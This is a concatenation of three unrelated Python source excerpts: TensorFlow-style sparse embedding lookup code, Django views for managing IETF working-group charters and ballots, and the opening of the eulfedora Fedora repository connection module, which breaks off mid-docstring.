is_in_first_extras_partitions = math_ops.cast(
p_assignments < extras, flat_ids.dtype)
new_ids = (
is_in_first_extras_partitions * (
flat_ids % (ids_per_partition + 1)) +
(1 - is_in_first_extras_partitions) * (
(flat_ids - extras) % ids_per_partition))
else:
raise ValueError("Unrecognized partition strategy: " +
partition_strategy)
# Cast partition assignments to int32 for use in dynamic_partition.
# There really should not be more than 2^32 partitions.
p_assignments = math_ops.cast(p_assignments, dtypes.int32)
# Partition list of ids based on assignments into np separate lists
gather_ids = data_flow_ops.dynamic_partition(new_ids, p_assignments, np)
# Similarly, partition the original indices.
pindices = data_flow_ops.dynamic_partition(original_indices,
p_assignments, np)
# Do np separate lookups, finding embeddings for plist[p] in params[p]
partitioned_result = []
for p in xrange(np):
with ops.colocate_with(params[p]):
partitioned_result.append(array_ops.gather(
params[p], gather_ids[p],
validate_indices=validate_indices))
# Stitch these back together
ret = data_flow_ops.dynamic_stitch(pindices, partitioned_result,
name=name)
# Reshape to reverse the flattening of ids.
element_shape = params[0].get_shape()[1:]
for p in params[1:]:
element_shape = element_shape.merge_with(p.get_shape()[1:])
if element_shape.is_fully_defined():
ret = array_ops.reshape(ret, array_ops.concat(0, [
array_ops.shape(ids), element_shape]))
else:
# It's important that we compute params[0].shape on the right device
# to avoid data motion.
with ops.colocate_with(params[0]):
params_shape = array_ops.shape(params[0])
ret = array_ops.reshape(ret, array_ops.concat(0, [
array_ops.shape(ids), array_ops.slice(params_shape, [1], [-1])]))
# output shape = ids.shape + params[*].shape[1:]
# Normally the reshape is sufficient, but setting shape explicitly
# teaches shape inference that params[1:].get_shape() matters.
ret.set_shape(ids.get_shape().concatenate(element_shape))
return ret
def embedding_lookup_sparse(params, sp_ids, sp_weights,
partition_strategy="mod",
name=None,
combiner="mean"):
"""Computes embeddings for the given ids and weights.
This op assumes that there is at least one id for each row in the dense tensor
represented by sp_ids (i.e. there are no rows with empty features), and that
all the indices of sp_ids are in canonical row-major order.
It also assumes that all id values lie in the range [0, p0), where p0
is the sum of the size of params along dimension 0.
Args:
params: A single tensor representing the complete embedding tensor,
or a list of P tensors all of same shape except for the first dimension,
representing sharded embedding tensors.
sp_ids: N x M SparseTensor of int64 ids (typically from FeatureValueToId),
where N is typically batch size and M is arbitrary.
sp_weights: either a SparseTensor of float / double weights, or None to
indicate all weights should be taken to be 1. If specified, sp_weights
must have exactly the same shape and indices as sp_ids.
partition_strategy: A string specifying the partitioning strategy, relevant
if `len(params) > 1`. Currently `"div"` and `"mod"` are supported. Default
is `"mod"`. See `tf.nn.embedding_lookup` for more details.
name: Optional name for the op.
combiner: A string specifying the reduction op. Currently "mean", "sqrtn"
and "sum" are supported.
"sum" computes the weighted sum of the embedding results for each row.
"mean" is the weighted sum divided by the total weight.
"sqrtn" is the weighted sum divided by the square root of the sum of the
squares of the weights.
Returns:
A dense tensor representing the combined embeddings for the
sparse ids. For each row in the dense tensor represented by sp_ids, the op
looks up the embeddings for all ids in that row, multiplies them by the
corresponding weight, and combines these embeddings as specified.
In other words, if
shape(combined params) = [p0, p1, ..., pm]
and
shape(sp_ids) = shape(sp_weights) = [d0, d1, ..., dn]
then
shape(output) = [d0, d1, ..., dn-1, p1, ..., pm].
For instance, if params is a 10x20 matrix, and sp_ids / sp_weights are
[0, 0]: id 1, weight 2.0
[0, 1]: id 3, weight 0.5
[1, 0]: id 0, weight 1.0
[2, 3]: id 1, weight 3.0
with combiner="mean", then the output will be a 3x20 matrix where
output[0, :] = (params[1, :] * 2.0 + params[3, :] * 0.5) / (2.0 + 0.5)
output[1, :] = params[0, :] * 1.0
output[2, :] = params[1, :] * 3.0
Raises:
TypeError: If sp_ids is not a SparseTensor, or if sp_weights is neither
None nor SparseTensor.
ValueError: If combiner is not one of {"mean", "sqrtn", "sum"}.
"""
if combiner not in ("mean", "sqrtn", "sum"):
raise ValueError("combiner must be one of 'mean', 'sqrtn' or 'sum'")
if not isinstance(params, list):
params = [params]
if not isinstance(sp_ids, ops.SparseTensor):
raise TypeError("sp_ids must be SparseTensor")
ignore_weights = sp_weights is None
if not ignore_weights:
if not isinstance(sp_weights, ops.SparseTensor):
raise TypeError("sp_weights must be either None or SparseTensor")
sp_ids.values.get_shape().assert_is_compatible_with(
sp_weights.values.get_shape())
sp_ids.indices.get_shape().assert_is_compatible_with(
sp_weights.indices.get_shape())
sp_ids.shape.get_shape().assert_is_compatible_with(
sp_weights.shape.get_shape())
# TODO(yleon): Add enhanced node assertions to verify that sp_ids and
# sp_weights have equal indices and shapes.
with ops.op_scope(params + [sp_ids], name, "embedding_lookup_sparse") as name:
segment_ids = sp_ids.indices[:, 0]
if segment_ids.dtype != dtypes.int32:
segment_ids = math_ops.cast(segment_ids, dtypes.int32)
ids = sp_ids.values
if ignore_weights:
ids, idx = array_ops.unique(ids)
else:
idx = None
embeddings = embedding_lookup(
params, ids, partition_strategy=partition_strategy)
if not ignore_weights:
weights = sp_weights.values
if weights.dtype != embeddings.dtype:
weights = math_ops.cast(weights, embeddings.dtype)
# Reshape weights to allow broadcast
ones = array_ops.fill(
array_ops.expand_dims(array_ops.rank(embeddings) - 1, 0), 1)
bcast_weights_shape = array_ops.concat(0, [
array_ops.shape(weights), ones])
orig_weights_shape = weights.get_shape()
weights = array_ops.reshape(weights, bcast_weights_shape)
# Set the weight shape, since after reshaping to bcast_weights_shape,
# the shape becomes None.
if embeddings.get_shape().ndims is not None:
weights.set_shape(orig_weights_shape.concatenate(
[1 for _ in range(embeddings.get_shape().ndims - 1)]))
embeddings *= weights
if combiner == "sum":
embeddings = math_ops.segment_sum(embeddings, segment_ids, name=name)
elif combiner == "mean":
embeddings = math_ops.segment_sum(embeddings, segment_ids)
weight_sum = math_ops.segment_sum(weights, segment_ids)
embeddings = math_ops.div(embeddings, weight_sum, name=name)
elif combiner == "sqrtn":
embeddings = math_ops.segment_sum(embeddings, segment_ids)
weights_squared = math_ops.pow(weights, 2)
weight_sum = math_ops.segment_sum(weights_squared, segment_ids)
weight_sum_sqrt = math_ops.sqrt(weight_sum)
embeddings = math_ops.div(embeddings, weight_sum_sqrt, name=name)
else:
assert False, "Unrecognized combiner"
else:
assert idx is not None
if combiner == "sum":
embeddings = math_ops.sparse_segment_sum(embeddings, idx, segment_ids,
name=name)
elif combiner == "mean":
embeddings = math_ops.sparse_segment_mean(embeddings, idx, segment_ids,
name=name)
elif combiner == "sqrtn":
embeddings = math_ops.sparse_segment_sqrt_n(embeddings, idx,
segment_ids, name=name)
else:
assert False, "Unrecognized combiner"
return embeddings
| |
import re, os, string, datetime, shutil, textwrap
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseNotFound, Http404
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.template.loader import render_to_string
from django.core.urlresolvers import reverse as urlreverse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django import forms
from django.forms.util import ErrorList
from django.utils import simplejson
from django.utils.html import strip_tags, escape
from django.utils.safestring import mark_safe
from django.conf import settings
from django.contrib import messages
from ietf.utils.mail import send_mail_preformatted
from ietf.utils.textupload import get_cleaned_text_file_content
from ietf.utils.history import find_history_active_at
from ietf.ietfauth.decorators import has_role, role_required
from ietf.iesg.models import TelechatDate
from ietf.doc.models import *
from ietf.doc.utils import *
from ietf.name.models import *
from ietf.person.models import *
from ietf.group.models import *
from ietf.group.utils import save_group_in_history, save_milestone_in_history
from ietf.wgcharter.mails import *
from ietf.wgcharter.utils import *
import debug
class ChangeStateForm(forms.Form):
charter_state = forms.ModelChoiceField(State.objects.filter(used=True, type="charter", slug__in=["infrev", "intrev", "extrev", "iesgrev"]), label="Charter state", empty_label=None, required=False)
initial_time = forms.IntegerField(initial=0, label="Review time", help_text="(in weeks)", required=False)
message = forms.CharField(widget=forms.Textarea, help_text="Leave blank to change state without notifying the Secretariat", required=False, label=mark_safe("Message to<br> Secretariat"))
comment = forms.CharField(widget=forms.Textarea, help_text="Optional comment for the charter history", required=False)
def __init__(self, *args, **kwargs):
self.hide = kwargs.pop('hide', None)
super(ChangeStateForm, self).__init__(*args, **kwargs)
# hide requested fields
if self.hide:
for f in self.hide:
self.fields[f].widget = forms.HiddenInput
@role_required("Area Director", "Secretariat")
def change_state(request, name, option=None):
"""Change state of charter, notifying parties as necessary and
logging the change as a comment."""
charter = get_object_or_404(Document, type="charter", name=name)
group = charter.group
chartering_type = get_chartering_type(charter)
initial_review = charter.latest_event(InitialReviewDocEvent, type="initial_review")
if charter.get_state_slug() != "infrev" or (initial_review and initial_review.expires < datetime.datetime.now()) or chartering_type == "rechartering":
initial_review = None
login = request.user.get_profile()
if request.method == 'POST':
form = ChangeStateForm(request.POST)
if form.is_valid():
clean = form.cleaned_data
charter_rev = charter.rev
if option in ("initcharter", "recharter"):
charter_state = State.objects.get(used=True, type="charter", slug="infrev")
# make sure we have the latest revision set, if we
# abandoned a charter before, we could have reset the
# revision to latest approved
prev_revs = charter.history_set.order_by('-rev')[:1]
if prev_revs and prev_revs[0].rev > charter_rev:
charter_rev = prev_revs[0].rev
if "-" not in charter_rev:
charter_rev = charter_rev + "-00"
elif option == "abandon":
oldstate = group.state
if oldstate.slug in ("proposed", "bof", "unknown"):
charter_state = State.objects.get(used=True, type="charter", slug="notrev")
#TODO : set an abandoned state and leave some comments here
group.state = GroupStateName.objects.get(slug='abandon')
group.save()
e = ChangeStateGroupEvent(group=group, type="changed_state")
e.time = group.time
e.by = login
e.state_id = group.state.slug
e.desc = "Group state changed to %s from %s" % (group.state, oldstate)
e.save()
else:
charter_state = State.objects.get(used=True, type="charter", slug="approved")
charter_rev = approved_revision(charter.rev)
else:
charter_state = clean['charter_state']
comment = clean['comment'].rstrip()
message = clean['message']
if charter_state != charter.get_state():
# Charter state changed
save_document_in_history(charter)
prev = charter.get_state()
charter.set_state(charter_state)
charter.rev = charter_rev
if option != "abandon":
log_state_changed(request, charter, login, prev)
else:
# kill hanging ballots
close_open_ballots(charter, login)
# Special log for abandoned efforts
e = DocEvent(type="changed_document", doc=charter, by=login)
e.desc = "IESG has abandoned the chartering effort"
e.save()
if comment:
c = DocEvent(type="added_comment", doc=charter, by=login)
c.desc = comment
c.save()
charter.time = datetime.datetime.now()
charter.save()
if message:
email_secretariat(request, group, "state-%s" % charter_state.slug, message)
email_state_changed(request, charter, "State changed to %s." % charter_state)
if charter_state.slug == "intrev":
if request.POST.get("ballot_wo_extern"):
create_ballot_if_not_open(charter, login, "r-wo-ext")
else:
create_ballot_if_not_open(charter, login, "r-extrev")
default_review_text(group, charter, login)
default_action_text(group, charter, login)
elif charter_state.slug == "iesgrev":
create_ballot_if_not_open(charter, login, "approve")
if charter_state.slug == "infrev" and clean["initial_time"] and clean["initial_time"] != 0:
e = InitialReviewDocEvent(type="initial_review", by=login, doc=charter)
e.expires = datetime.datetime.now() + datetime.timedelta(weeks=clean["initial_time"])
e.desc = "Initial review time expires %s" % e.expires.strftime("%Y-%m-%d")
e.save()
return redirect('doc_view', name=charter.name)
else:
if option == "recharter":
hide = ['initial_time', 'charter_state', 'message']
init = dict()
elif option == "initcharter":
hide = ['charter_state']
init = dict(initial_time=1, message='%s has initiated chartering of the proposed %s:\n "%s" (%s).' % (login.plain_name(), group.type.name, group.name, group.acronym))
elif option == "abandon":
hide = ['initial_time', 'charter_state']
init = dict(message='%s has abandoned the chartering effort on the %s:\n "%s" (%s).' % (login.plain_name(), group.type.name, group.name, group.acronym))
else:
hide = ['initial_time']
s = charter.get_state()
init = dict(charter_state=s.pk if s else None)
form = ChangeStateForm(hide=hide, initial=init)
prev_charter_state = None
charter_hists = DocHistory.objects.filter(doc=charter).exclude(states__type="charter", states__slug=charter.get_state_slug()).order_by("-time")[:1]
if charter_hists:
prev_charter_state = charter_hists[0].get_state()
title = {
"initcharter": "Initiate chartering of %s %s" % (group.acronym, group.type.name),
"recharter": "Recharter %s %s" % (group.acronym, group.type.name),
"abandon": "Abandon effort on %s %s" % (group.acronym, group.type.name),
}.get(option)
if not title:
title = "Change chartering state of %s %s" % (group.acronym, group.type.name)
def state_pk(slug):
return State.objects.get(used=True, type="charter", slug=slug).pk
info_msg = {
state_pk("infrev"): 'The %s "%s" (%s) has been set to Informal IESG review by %s.' % (group.type.name, group.name, group.acronym, login.plain_name()),
state_pk("intrev"): 'The %s "%s" (%s) has been set to Internal review by %s.\nPlease place it on the next IESG telechat and inform the IAB.' % (group.type.name, group.name, group.acronym, login.plain_name()),
state_pk("extrev"): 'The %s "%s" (%s) has been set to External review by %s.\nPlease send out the external review announcement to the appropriate lists.\n\nSend the announcement to other SDOs: Yes\nAdditional recipients of the announcement: ' % (group.type.name, group.name, group.acronym, login.plain_name()),
}
states_for_ballot_wo_extern = State.objects.filter(used=True, type="charter", slug="intrev").values_list("pk", flat=True)
return render_to_response('wgcharter/change_state.html',
dict(form=form,
doc=group.charter,
login=login,
option=option,
prev_charter_state=prev_charter_state,
title=title,
initial_review=initial_review,
chartering_type=chartering_type,
info_msg=simplejson.dumps(info_msg),
states_for_ballot_wo_extern=simplejson.dumps(list(states_for_ballot_wo_extern)),
),
context_instance=RequestContext(request))
class TelechatForm(forms.Form):
telechat_date = forms.TypedChoiceField(coerce=lambda x: datetime.datetime.strptime(x, '%Y-%m-%d').date(), empty_value=None, required=False)
def __init__(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
dates = [d.date for d in TelechatDate.objects.active().order_by('date')]
init = kwargs['initial'].get("telechat_date")
if init and init not in dates:
dates.insert(0, init)
self.fields['telechat_date'].choices = [("", "(not on agenda)")] + [(d, d.strftime("%Y-%m-%d")) for d in dates]
@role_required("Area Director", "Secretariat")
def telechat_date(request, name):
doc = get_object_or_404(Document, type="charter", name=name)
login = request.user.get_profile()
e = doc.latest_event(TelechatDocEvent, type="scheduled_for_telechat")
initial = dict(telechat_date=e.telechat_date if e else None)
if request.method == "POST":
form = TelechatForm(request.POST, initial=initial)
if form.is_valid():
update_telechat(request, doc, login, form.cleaned_data['telechat_date'])
return redirect("doc_view", name=doc.name)
else:
form = TelechatForm(initial=initial)
return render_to_response('wgcharter/edit_telechat_date.html',
dict(doc=doc,
form=form,
user=request.user,
login=login,
okstates=['intrev','extrev','iesgrev'],
),
context_instance=RequestContext(request))
class NotifyForm(forms.Form):
notify = forms.CharField(max_length=255, help_text="List of email addresses to receive state notifications, separated by comma", label="Notification list", required=False)
def clean_notify(self):
return self.cleaned_data["notify"].strip()
@role_required("Area Director", "Secretariat")
def edit_notify(request, name):
doc = get_object_or_404(Document, type="charter", name=name)
login = request.user.get_profile()
init = {'notify': doc.notify}
if request.method == "POST":
form = NotifyForm(request.POST, initial=init)
if form.is_valid():
n = form.cleaned_data["notify"]
if n != doc.notify:
save_document_in_history(doc)
e = DocEvent(doc=doc, by=login)
e.desc = "Notification list changed to %s" % (escape(n) or "none")
if doc.notify:
e.desc += " from %s" % escape(doc.notify)
e.type = "changed_document"
e.save()
doc.notify = n
doc.time = e.time
doc.save()
return redirect("doc_view", name=doc.name)
else:
form = NotifyForm(initial=init)
return render_to_response('wgcharter/edit_notify.html',
dict(doc=doc,
form=form,
user=request.user,
login=login),
context_instance=RequestContext(request))
class AdForm(forms.Form):
ad = forms.ModelChoiceField(Person.objects.filter(role__name="ad", role__group__state="active").order_by('name'),
label="Responsible AD", empty_label="(None)", required=True)
def __init__(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
# if previous AD is now ex-AD, append that person to the list
ad_pk = self.initial.get('ad')
choices = self.fields['ad'].choices
if ad_pk and ad_pk not in [pk for pk, name in choices]:
self.fields['ad'].choices = list(choices) + [("", "-------"), (ad_pk, Person.objects.get(pk=ad_pk).plain_name())]
@role_required("Area Director", "Secretariat")
def edit_ad(request, name):
"""Change the responsible Area Director for this charter."""
charter = get_object_or_404(Document, type="charter", name=name)
login = request.user.get_profile()
if request.method == 'POST':
form = AdForm(request.POST)
if form.is_valid():
new_ad = form.cleaned_data['ad']
if new_ad != charter.ad:
save_document_in_history(charter)
e = DocEvent(doc=charter, by=login)
e.desc = "Responsible AD changed to %s" % new_ad.plain_name()
if charter.ad:
e.desc += " from %s" % charter.ad.plain_name()
e.type = "changed_document"
e.save()
charter.ad = new_ad
charter.time = e.time
charter.save()
return HttpResponseRedirect(reverse('doc_view', kwargs={'name': charter.name}))
else:
init = { "ad" : charter.ad_id }
form = AdForm(initial=init)
return render_to_response('wgcharter/change_ad.html',
{'form': form,
'charter': charter,
},
context_instance = RequestContext(request))
class UploadForm(forms.Form):
content = forms.CharField(widget=forms.Textarea, label="Charter text", help_text="Edit the charter text", required=False)
txt = forms.FileField(label=".txt format", help_text="Or upload a .txt file", required=False)
def clean_content(self):
return self.cleaned_data["content"].replace("\r", "")
def clean_txt(self):
return get_cleaned_text_file_content(self.cleaned_data["txt"])
def save(self, group, rev):
filename = os.path.join(settings.CHARTER_PATH, '%s-%s.txt' % (group.charter.canonical_name(), rev))
with open(filename, 'wb') as destination:
if self.cleaned_data['txt']:
destination.write(self.cleaned_data['txt'])
else:
destination.write(self.cleaned_data['content'].encode("utf-8"))
@role_required('Area Director','Secretariat')
def submit(request, name=None, acronym=None, option=None):
if name:
if not name.startswith('charter-'):
name = "charter-ietf-" + name
elif acronym:
name = "charter-ietf-" + acronym
charter = get_object_or_404(Document, type="charter", name=name)
group = charter.group
login = request.user.get_profile()
path = os.path.join(settings.CHARTER_PATH, '%s-%s.txt' % (charter.canonical_name(), charter.rev))
not_uploaded_yet = charter.rev.endswith("-00") and not os.path.exists(path)
if not_uploaded_yet:
# this case is special - we recently chartered or rechartered and have no file yet
next_rev = charter.rev
else:
# search history for possible collisions with abandoned efforts
prev_revs = list(charter.history_set.order_by('-time').values_list('rev', flat=True))
next_rev = next_revision(charter.rev)
while next_rev in prev_revs:
next_rev = next_revision(next_rev)
if request.method == 'POST':
form = UploadForm(request.POST, request.FILES)
if form.is_valid():
save_document_in_history(charter)
# Also save group history so we can search for it
save_group_in_history(group)
charter.rev = next_rev
e = NewRevisionDocEvent(doc=charter, by=login, type="new_revision")
e.desc = "New version available: <b>%s-%s.txt</b>" % (charter.canonical_name(), charter.rev)
e.rev = charter.rev
e.save()
# Save file on disk
form.save(group, charter.rev)
charter.time = datetime.datetime.now()
charter.save()
if option:
return redirect('charter_startstop_process', name=charter.name, option=option)
else:
return redirect("doc_view", name=charter.name)
else:
init = { "content": ""}
c = charter
if not_uploaded_yet:
# use text from last approved revision
last_approved = charter.rev.split("-")[0]
h = charter.history_set.filter(rev=last_approved).order_by("-time", "-id")
if h:
c = h[0]
filename = os.path.join(settings.CHARTER_PATH, '%s-%s.txt' % (c.canonical_name(), c.rev))
try:
with open(filename, 'r') as f:
init["content"] = f.read()
except IOError:
pass
form = UploadForm(initial=init)
return render_to_response('wgcharter/submit.html',
{'form': form,
'next_rev': next_rev,
'group': group },
context_instance=RequestContext(request))
class AnnouncementTextForm(forms.Form):
announcement_text = forms.CharField(widget=forms.Textarea, required=True)
def clean_announcement_text(self):
return self.cleaned_data["announcement_text"].replace("\r", "")
@role_required('Area Director','Secretariat')
def announcement_text(request, name, ann):
"""Editing of announcement text"""
charter = get_object_or_404(Document, type="charter", name=name)
group = charter.group
login = request.user.get_profile()
if ann in ("action", "review"):
existing = charter.latest_event(WriteupDocEvent, type="changed_%s_announcement" % ann)
if not existing:
if ann == "action":
existing = default_action_text(group, charter, login)
elif ann == "review":
existing = default_review_text(group, charter, login)
if not existing:
raise Http404
form = AnnouncementTextForm(initial=dict(announcement_text=existing.text))
if request.method == 'POST':
form = AnnouncementTextForm(request.POST)
if "save_text" in request.POST and form.is_valid():
t = form.cleaned_data['announcement_text']
if t != existing.text:
e = WriteupDocEvent(doc=charter, by=login)
e.by = login
e.type = "changed_%s_announcement" % ann
e.desc = "%s %s text was changed" % (group.type.name, ann)
e.text = t
e.save()
charter.time = e.time
charter.save()
if request.GET.get("next", "") == "approve":
return redirect('charter_approve', name=charter.canonical_name())
return redirect('doc_writeup', name=charter.canonical_name())
if "regenerate_text" in request.POST:
if ann == "action":
e = default_action_text(group, charter, login)
elif ann == "review":
e = default_review_text(group, charter, login)
# make sure form has the updated text
form = AnnouncementTextForm(initial=dict(announcement_text=e.text))
if "send_text" in request.POST and form.is_valid():
parsed_msg = send_mail_preformatted(request, form.cleaned_data['announcement_text'])
messages.success(request, "The email To: '%s' with Subjet: '%s' has been sent." % (parsed_msg["To"],parsed_msg["Subject"],))
return redirect('doc_writeup', name=charter.name)
return render_to_response('wgcharter/announcement_text.html',
dict(charter=charter,
announcement=ann,
back_url=urlreverse("doc_writeup", kwargs=dict(name=charter.name)),
announcement_text_form=form,
),
context_instance=RequestContext(request))
class BallotWriteupForm(forms.Form):
ballot_writeup = forms.CharField(widget=forms.Textarea, required=True)
def clean_ballot_writeup(self):
return self.cleaned_data["ballot_writeup"].replace("\r", "")
@role_required('Area Director','Secretariat')
def ballot_writeupnotes(request, name):
"""Editing of ballot write-up and notes"""
charter = get_object_or_404(Document, type="charter", name=name)
ballot = charter.latest_event(BallotDocEvent, type="created_ballot")
if not ballot:
raise Http404()
login = request.user.get_profile()
approval = charter.latest_event(WriteupDocEvent, type="changed_action_announcement")
existing = charter.latest_event(WriteupDocEvent, type="changed_ballot_writeup_text")
if not existing:
existing = generate_ballot_writeup(request, charter)
reissue = charter.latest_event(DocEvent, type="sent_ballot_announcement")
form = BallotWriteupForm(initial=dict(ballot_writeup=existing.text))
if request.method == 'POST' and ("save_ballot_writeup" in request.POST or "send_ballot" in request.POST):
form = BallotWriteupForm(request.POST)
if form.is_valid():
t = form.cleaned_data["ballot_writeup"]
if t != existing.text:
e = WriteupDocEvent(doc=charter, by=login)
e.by = login
e.type = "changed_ballot_writeup_text"
e.desc = "Ballot writeup was changed"
e.text = t
e.save()
if "send_ballot" in request.POST and approval:
if has_role(request.user, "Area Director") and not charter.latest_event(BallotPositionDocEvent, type="changed_ballot_position", ad=login, ballot=ballot):
# sending the ballot counts as a yes
pos = BallotPositionDocEvent(doc=charter, by=login)
pos.type = "changed_ballot_position"
pos.ad = login
pos.pos_id = "yes"
pos.desc = "[Ballot Position Update] New position, %s, has been recorded for %s" % (pos.pos.name, pos.ad.plain_name())
pos.save()
msg = generate_issue_ballot_mail(request, charter, ballot)
send_mail_preformatted(request, msg)
e = DocEvent(doc=charter, by=login)
e.by = login
e.type = "sent_ballot_announcement"
e.desc = "Ballot has been sent"
e.save()
return render_to_response('wgcharter/ballot_issued.html',
dict(doc=charter,
),
context_instance=RequestContext(request))
return render_to_response('wgcharter/ballot_writeupnotes.html',
dict(charter=charter,
ballot_issued=bool(charter.latest_event(type="sent_ballot_announcement")),
ballot_writeup_form=form,
reissue=reissue,
approval=approval,
),
context_instance=RequestContext(request))
@role_required("Secretariat")
def approve(request, name):
"""Approve charter, changing state, fixing revision, copying file to final location."""
charter = get_object_or_404(Document, type="charter", name=name)
group = charter.group
login = request.user.get_profile()
e = charter.latest_event(WriteupDocEvent, type="changed_action_announcement")
if not e:
announcement = default_action_text(group, charter, login).text
else:
announcement = e.text
if request.method == 'POST':
new_charter_state = State.objects.get(used=True, type="charter", slug="approved")
prev_charter_state = charter.get_state()
save_document_in_history(charter)
charter.set_state(new_charter_state)
close_open_ballots(charter, login)
# approve
e = DocEvent(doc=charter, by=login)
e.type = "iesg_approved"
e.desc = "IESG has approved the charter"
e.save()
change_description = e.desc
new_state = GroupStateName.objects.get(slug="active")
if group.state != new_state:
save_group_in_history(group)
prev_state = group.state
group.state = new_state
group.time = e.time
group.save()
# create an event for the wg state change, too
e = ChangeStateGroupEvent(group=group, type="changed_state")
e.time = group.time
e.by = login
e.state_id = "active"
e.desc = "Charter approved, group active"
e.save()
change_description += " and %s state has been changed to %s" % (group.type.name, new_state.name)
e = log_state_changed(request, charter, login, prev_charter_state)
# according to spec, 00-02 becomes 01, so copy file and record new revision
try:
old = os.path.join(charter.get_file_path(), '%s-%s.txt' % (charter.canonical_name(), charter.rev))
new = os.path.join(charter.get_file_path(), '%s-%s.txt' % (charter.canonical_name(), next_approved_revision(charter.rev)))
shutil.copy(old, new)
except IOError:
return HttpResponse("There was an error copying %s to %s" %
('%s-%s.txt' % (charter.canonical_name(), charter.rev),
'%s-%s.txt' % (charter.canonical_name(), next_approved_revision(charter.rev))))
e = NewRevisionDocEvent(doc=charter, by=login, type="new_revision")
e.rev = next_approved_revision(charter.rev)
e.desc = "New version available: <b>%s-%s.txt</b>" % (charter.canonical_name(), e.rev)
e.save()
charter.rev = e.rev
charter.time = e.time
charter.save()
email_secretariat(request, group, "state-%s" % new_charter_state.slug, change_description)
# move milestones over
milestones_to_delete = list(group.groupmilestone_set.filter(state__in=("active", "review")))
for m in group.groupmilestone_set.filter(state="charter"):
# see if we got this milestone already (i.e. it was copied
# verbatim to the charter)
found = False
for i, o in enumerate(milestones_to_delete):
if o.desc == m.desc and o.due == m.due and set(o.docs.all()) == set(m.docs.all()):
found = True
break
if found:
# keep existing, whack charter milestone
if not o.state_id == "active":
save_milestone_in_history(o)
o.state_id = "active"
o.save()
MilestoneGroupEvent.objects.create(
group=group, type="changed_milestone", by=login,
desc="Changed milestone \"%s\", set state to active from review" % o.desc,
milestone=o)
del milestones_to_delete[i]
# don't generate a DocEvent for this, it's implicit in the approval event
save_milestone_in_history(m)
m.state_id = "deleted"
m.save()
else:
# move charter milestone
save_milestone_in_history(m)
m.state_id = "active"
m.save()
MilestoneGroupEvent.objects.create(
group=group, type="changed_milestone", by=login,
desc="Added milestone \"%s\", due %s, from approved charter" % (m.desc, m.due),
milestone=m)
for m in milestones_to_delete:
save_milestone_in_history(m)
m.state_id = "deleted"
m.save()
MilestoneGroupEvent.objects.create(
group=group, type="changed_milestone", by=login,
desc="Deleted milestone \"%s\", not present in approved charter" % m.desc,
milestone=m)
# send announcement
send_mail_preformatted(request, announcement)
return HttpResponseRedirect(charter.get_absolute_url())
return render_to_response('wgcharter/approve.html',
dict(charter=charter,
announcement=announcement),
context_instance=RequestContext(request))
def charter_with_milestones_txt(request, name, rev):
charter = get_object_or_404(Document, type="charter", docalias__name=name)
revision_event = charter.latest_event(NewRevisionDocEvent, type="new_revision", rev=rev)
if not revision_event:
return HttpResponseNotFound("Revision %s not found in database" % rev)
# read charter text
c = find_history_active_at(charter, revision_event.time) or charter
filename = '%s-%s.txt' % (c.canonical_name(), rev)
charter_text = ""
try:
with open(os.path.join(settings.CHARTER_PATH, filename), 'r') as f:
charter_text = unicode(f.read(), errors='ignore')
except IOError:
charter_text = "Error reading charter text %s" % filename
milestones = historic_milestones_for_charter(charter, rev)
# wrap the output nicely
wrapper = textwrap.TextWrapper(initial_indent="", subsequent_indent=" " * 11, width=80, break_long_words=False)
for m in milestones:
m.desc_filled = wrapper.fill(m.desc)
return render_to_response('wgcharter/charter_with_milestones.txt',
dict(charter_text=charter_text,
milestones=milestones),
context_instance=RequestContext(request),
mimetype="text/plain")
| |
# file eulfedora/server.py
#
# Copyright 2010,2011 Emory University Libraries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:class:`eulfedora.server.Repository` has the capability to
automatically use connection configuration parameters pulled from
Django settings, when available, but it can also be used without Django.
When you create an instance of :class:`~eulfedora.server.Repository`,
if you do not specify connection parameters, it will attempt to
initialize the repository connection based on Django settings, using
the configuration names documented below.
If you are writing unit tests that use :mod:`eulfedora`, you may want
to take advantage of
:class:`eulfedora.testutil.FedoraTestSuiteRunner`, which has logic to
set up and switch configurations between a development fedora
repository and a test repository.
Projects that use this module should include the following settings in their
``settings.py``::
# Fedora Repository settings
FEDORA_ROOT = 'http://fedora.host.name:8080/fedora/'
FEDORA_USER = 'user'
FEDORA_PASSWORD = 'password'
FEDORA_PIDSPACE = 'changeme'
FEDORA_TEST_ROOT = 'http://fedora.host.name:8180/fedora/'
FEDORA_TEST_PIDSPACE = 'testme'
# optional retry setting (default is 3)
FEDORA_CONNECTION_RETRIES = None
If username and password are not specified, the Repository instance
will be initialized without credentials and access Fedora as an
anonymous user. If pidspace is not specified, the Repository will use
the default pidspace for the configured Fedora instance.
Projects that need unit test setup and clean-up tasks (syncrepo and
test object removal) to access Fedora with different credentials than
the configured Fedora credentials should use the following settings::
FEDORA_TEST_USER = 'testuser'
FEDORA_TEST_PASSWORD = 'testpassword'
----
"""
from __future__ import unicode_literals
import logging
import requests
import warnings
import six
from eulfedora.rdfns import model as modelns
from eulfedora.api import ApiFacade, ResourceIndex
from eulfedora.models import DigitalObject
from eulfedora.util import parse_xml_object
from eulfedora.xml import SearchResults, NewPids
logger = logging.getLogger(__name__)
# a repository object, basically a handy facade for easy api access
class Repository(object):
"""Pythonic interface to a single Fedora Commons repository instance.
Connect to a single Fedora Repository by passing in connection
parameters or based on configuration in a Django settings file.
If username and password are specified, they will override any
fedora credentials configuredin Django settings.
If a request object is passed in and the user is logged in, this
class will look for credentials in the session, as set by
:meth:`~eulcore.django.fedora.views.login_and_store_credentials_in_session`
(see method documentation for more details and potential security
risks).
Order of precedence for credentials:
* If a request object is passed in and user credentials are
available in the session, that will be used first.
* Explicit username and password parameters will be used next.
* If none of these options are available, fedora credentials
will be set in django settings will be used.
If a *retries* value is specified, this will override the default
set in :attr:`Repository.retries` which is used to configure the
maximum number of requests retries for connection errors (see
http://docs.python-requests.org/en/master/api/#requests.adapters.HTTPAdapter).
Retries can also be specified via Django settings as
